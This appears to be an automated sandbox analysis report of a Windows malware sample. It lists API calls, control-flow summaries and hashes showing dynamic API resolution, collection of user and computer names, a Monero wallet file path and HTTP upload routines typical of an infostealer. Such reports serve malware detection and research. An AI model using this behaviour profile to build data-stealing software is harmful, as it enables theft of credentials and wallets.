                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4622
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: c8472a44736e14bc2d0bc15c6720c7b32998b1383afead38275d4c0614e75252
                          • Instruction ID: 1023729206cfa85cde442f608b2585d2a44882422b04f1f781fea129d7217589
                          • Opcode Fuzzy Hash: c8472a44736e14bc2d0bc15c6720c7b32998b1383afead38275d4c0614e75252
                          • Instruction Fuzzy Hash: 354106617C278CEBEE26FFAC8945E9E7656EF4270AF907144E912622C0CFB0B5804935
                          Function 00DE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 de4880-de4942 call dfa7a0 call de47b0 call dfa740 * 5 InternetOpenA StrCmpCA 816 de494b-de494f 801->816 817 de4944 801->817 818 de4ecb-de4ef3 InternetCloseHandle call dfaad0 call de9ac0 816->818 819 de4955-de4acd call df8b60 call dfa920 call dfa8a0 call dfa800 * 2 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa920 call dfa8a0 call dfa800 * 2 InternetConnectA 816->819 817->816 828 de4ef5-de4f2d call dfa820 call dfa9b0 call dfa8a0 call dfa800 818->828 829 de4f32-de4fa2 call df8990 * 2 call dfa7a0 call dfa800 * 8 818->829 819->818 905 de4ad3-de4ad7 819->905 828->829 906 de4ad9-de4ae3 905->906 907 de4ae5 905->907 908 de4aef-de4b22 HttpOpenRequestA 906->908 907->908 909 de4ebe-de4ec5 InternetCloseHandle 908->909 910 de4b28-de4e28 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa740 call dfa920 * 2 call dfa8a0 call dfa800 * 2 call dfaad0 lstrlen call dfaad0 * 2 lstrlen call dfaad0 HttpSendRequestA 908->910 909->818 1021 de4e32-de4e5c InternetReadFile 910->1021 1022 de4e5e-de4e65 1021->1022 1023 de4e67-de4eb9 InternetCloseHandle call dfa800 1021->1023 1022->1023 1024 de4e69-de4ea7 call dfa9b0 call dfa8a0 call dfa800 1022->1024 1023->909 1024->1021
                          APIs
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                            • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE4915
                          • StrCmpCA.SHLWAPI(?,00840B30), ref: 00DE493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E00DDB,00000000,?,?,00000000,?,",00000000,?,00840BF0), ref: 00DE4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00DE4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00DE4EC5
                          • HttpOpenRequestA.WININET(00000000,00840C10,?,00840030,00000000,00000000,00400100,00000000), ref: 00DE4B15
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00DE4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                          • Instruction ID: 8091c23c60feb5a8c3bac10016096318978e3986fe67815c1896da0bb4d100cd
                          • Opcode Fuzzy Hash: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                          • Instruction Fuzzy Hash: 7212DCB191021CAADB15EB94DC92FEEB378EF54340F5581A9B20A66091DFB02F49CF71
                          Function 00DF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                          • Instruction ID: b480fa98abc5c20da14bbe751e36b7d0fa4a2222d3c9910be5d0655ce6ad7f0d
                          • Opcode Fuzzy Hash: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                          • Instruction Fuzzy Hash: 5C01A9B1A04209EFC710DF94DD45FAEBBB8F704B21F11421AFA45E3680C7B959048BB1
                          Function 00DF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                          • Instruction ID: 5a448d23c658373e77c34eb349424558cb154523492d71a329491e973fe496e7
                          • Opcode Fuzzy Hash: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                          • Instruction Fuzzy Hash: AFF04FB1E44208EFC724DF98D949FAEBBB8FB04721F10065AFA45A3680C7B955048BA1
                          Function 00DE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                          • Instruction ID: 50da218900c40e776c324182e9162bc9c570d019105f0ecda21c70c5030fa801
                          • Opcode Fuzzy Hash: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                          • Instruction Fuzzy Hash: B9D05E74A0030CDBCB20EFE0DC496EDBBB8FB08311F100554D90663740EA315481CBA9
                          Function 00DF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 df9c10-df9c1a 634 dfa036-dfa0ca LoadLibraryA * 8 633->634 635 df9c20-dfa031 GetProcAddress * 43 633->635 636 dfa0cc-dfa141 GetProcAddress * 5 634->636 637 dfa146-dfa14d 634->637 635->634 636->637 638 dfa216-dfa21d 637->638 639 dfa153-dfa211 GetProcAddress * 8 637->639 640 dfa21f-dfa293 GetProcAddress * 5 638->640 641 dfa298-dfa29f 638->641 639->638 640->641 642 dfa337-dfa33e 641->642 643 dfa2a5-dfa332 GetProcAddress * 6 641->643 644 dfa41f-dfa426 642->644 645 dfa344-dfa41a GetProcAddress * 9 642->645 643->642 646 dfa428-dfa49d GetProcAddress * 5 644->646 647 dfa4a2-dfa4a9 644->647 645->644 646->647 648 dfa4dc-dfa4e3 647->648 649 dfa4ab-dfa4d7 GetProcAddress * 2 647->649 650 dfa515-dfa51c 648->650 651 dfa4e5-dfa510 GetProcAddress * 2 648->651 649->648 652 dfa612-dfa619 650->652 653 dfa522-dfa60d GetProcAddress * 10 650->653 651->650 654 dfa67d-dfa684 652->654 655 dfa61b-dfa678 GetProcAddress * 4 652->655 653->652 656 dfa69e-dfa6a5 654->656 657 dfa686-dfa699 GetProcAddress 654->657 655->654 658 dfa708-dfa709 656->658 659 dfa6a7-dfa703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00825248), ref: 00DF9C2D
                          • GetProcAddress.KERNEL32(76210000,00825208), ref: 00DF9C45
                          • GetProcAddress.KERNEL32(76210000,00839070), ref: 00DF9C5E
                          • GetProcAddress.KERNEL32(76210000,00838FE0), ref: 00DF9C76
                          • GetProcAddress.KERNEL32(76210000,00839040), ref: 00DF9C8E
                          • GetProcAddress.KERNEL32(76210000,0083ED40), ref: 00DF9CA7
                          • GetProcAddress.KERNEL32(76210000,0082A6A8), ref: 00DF9CBF
                          • GetProcAddress.KERNEL32(76210000,0083ED28), ref: 00DF9CD7
                          • GetProcAddress.KERNEL32(76210000,0083EC50), ref: 00DF9CF0
                          • GetProcAddress.KERNEL32(76210000,0083EC68), ref: 00DF9D08
                          • GetProcAddress.KERNEL32(76210000,0083EDE8), ref: 00DF9D20
                          • GetProcAddress.KERNEL32(76210000,00825228), ref: 00DF9D39
                          • GetProcAddress.KERNEL32(76210000,00825268), ref: 00DF9D51
                          • GetProcAddress.KERNEL32(76210000,00825128), ref: 00DF9D69
                          • GetProcAddress.KERNEL32(76210000,00825328), ref: 00DF9D82
                          • GetProcAddress.KERNEL32(76210000,0083EB30), ref: 00DF9D9A
                          • GetProcAddress.KERNEL32(76210000,0083EB60), ref: 00DF9DB2
                          • GetProcAddress.KERNEL32(76210000,0082A590), ref: 00DF9DCB
                          • GetProcAddress.KERNEL32(76210000,00825148), ref: 00DF9DE3
                          • GetProcAddress.KERNEL32(76210000,0083ED88), ref: 00DF9DFB
                          • GetProcAddress.KERNEL32(76210000,0083EB48), ref: 00DF9E14
                          • GetProcAddress.KERNEL32(76210000,0083ED58), ref: 00DF9E2C
                          • GetProcAddress.KERNEL32(76210000,0083ED70), ref: 00DF9E44
                          • GetProcAddress.KERNEL32(76210000,00824FC8), ref: 00DF9E5D
                          • GetProcAddress.KERNEL32(76210000,0083EB18), ref: 00DF9E75
                          • GetProcAddress.KERNEL32(76210000,0083EBF0), ref: 00DF9E8D
                          • GetProcAddress.KERNEL32(76210000,0083EDA0), ref: 00DF9EA6
                          • GetProcAddress.KERNEL32(76210000,0083EBA8), ref: 00DF9EBE
                          • GetProcAddress.KERNEL32(76210000,0083EBD8), ref: 00DF9ED6
                          • GetProcAddress.KERNEL32(76210000,0083EB90), ref: 00DF9EEF
                          • GetProcAddress.KERNEL32(76210000,0083EC80), ref: 00DF9F07
                          • GetProcAddress.KERNEL32(76210000,0083EC08), ref: 00DF9F1F
                          • GetProcAddress.KERNEL32(76210000,0083EDD0), ref: 00DF9F38
                          • GetProcAddress.KERNEL32(76210000,0082FDA8), ref: 00DF9F50
                          • GetProcAddress.KERNEL32(76210000,0083EC98), ref: 00DF9F68
                          • GetProcAddress.KERNEL32(76210000,0083ED10), ref: 00DF9F81
                          • GetProcAddress.KERNEL32(76210000,00824F88), ref: 00DF9F99
                          • GetProcAddress.KERNEL32(76210000,0083EB78), ref: 00DF9FB1
                          • GetProcAddress.KERNEL32(76210000,008251C8), ref: 00DF9FCA
                          • GetProcAddress.KERNEL32(76210000,0083EDB8), ref: 00DF9FE2
                          • GetProcAddress.KERNEL32(76210000,0083EC20), ref: 00DF9FFA
                          • GetProcAddress.KERNEL32(76210000,00824F48), ref: 00DFA013
                          • GetProcAddress.KERNEL32(76210000,00825288), ref: 00DFA02B
                          • LoadLibraryA.KERNEL32(0083EB00,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA03D
                          • LoadLibraryA.KERNEL32(0083ECE0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA04E
                          • LoadLibraryA.KERNEL32(0083EC38,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA060
                          • LoadLibraryA.KERNEL32(0083EBC0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA072
                          • LoadLibraryA.KERNEL32(0083ECB0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA083
                          • LoadLibraryA.KERNEL32(0083ECC8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA095
                          • LoadLibraryA.KERNEL32(0083ECF8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0A7
                          • LoadLibraryA.KERNEL32(0083EE30,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0B8
                          • GetProcAddress.KERNEL32(751E0000,00824FA8), ref: 00DFA0DA
                          • GetProcAddress.KERNEL32(751E0000,0083EF50), ref: 00DFA0F2
                          • GetProcAddress.KERNEL32(751E0000,00838B08), ref: 00DFA10A
                          • GetProcAddress.KERNEL32(751E0000,0083EEC0), ref: 00DFA123
                          • GetProcAddress.KERNEL32(751E0000,008251E8), ref: 00DFA13B
                          • GetProcAddress.KERNEL32(700F0000,0082A928), ref: 00DFA160
                          • GetProcAddress.KERNEL32(700F0000,008256E8), ref: 00DFA179
                          • GetProcAddress.KERNEL32(700F0000,0082A450), ref: 00DFA191
                          • GetProcAddress.KERNEL32(700F0000,0083EF68), ref: 00DFA1A9
                          • GetProcAddress.KERNEL32(700F0000,0083EE18), ref: 00DFA1C2
                          • GetProcAddress.KERNEL32(700F0000,008256C8), ref: 00DFA1DA
                          • GetProcAddress.KERNEL32(700F0000,008253E8), ref: 00DFA1F2
                          • GetProcAddress.KERNEL32(700F0000,0083EED8), ref: 00DFA20B
                          • GetProcAddress.KERNEL32(753A0000,00825608), ref: 00DFA22C
                          • GetProcAddress.KERNEL32(753A0000,008253C8), ref: 00DFA244
                          • GetProcAddress.KERNEL32(753A0000,0083EEF0), ref: 00DFA25D
                          • GetProcAddress.KERNEL32(753A0000,0083EEA8), ref: 00DFA275
                          • GetProcAddress.KERNEL32(753A0000,00825408), ref: 00DFA28D
                          • GetProcAddress.KERNEL32(76310000,0082A7C0), ref: 00DFA2B3
                          • GetProcAddress.KERNEL32(76310000,0082A540), ref: 00DFA2CB
                          • GetProcAddress.KERNEL32(76310000,0083EE48), ref: 00DFA2E3
                          • GetProcAddress.KERNEL32(76310000,008253A8), ref: 00DFA2FC
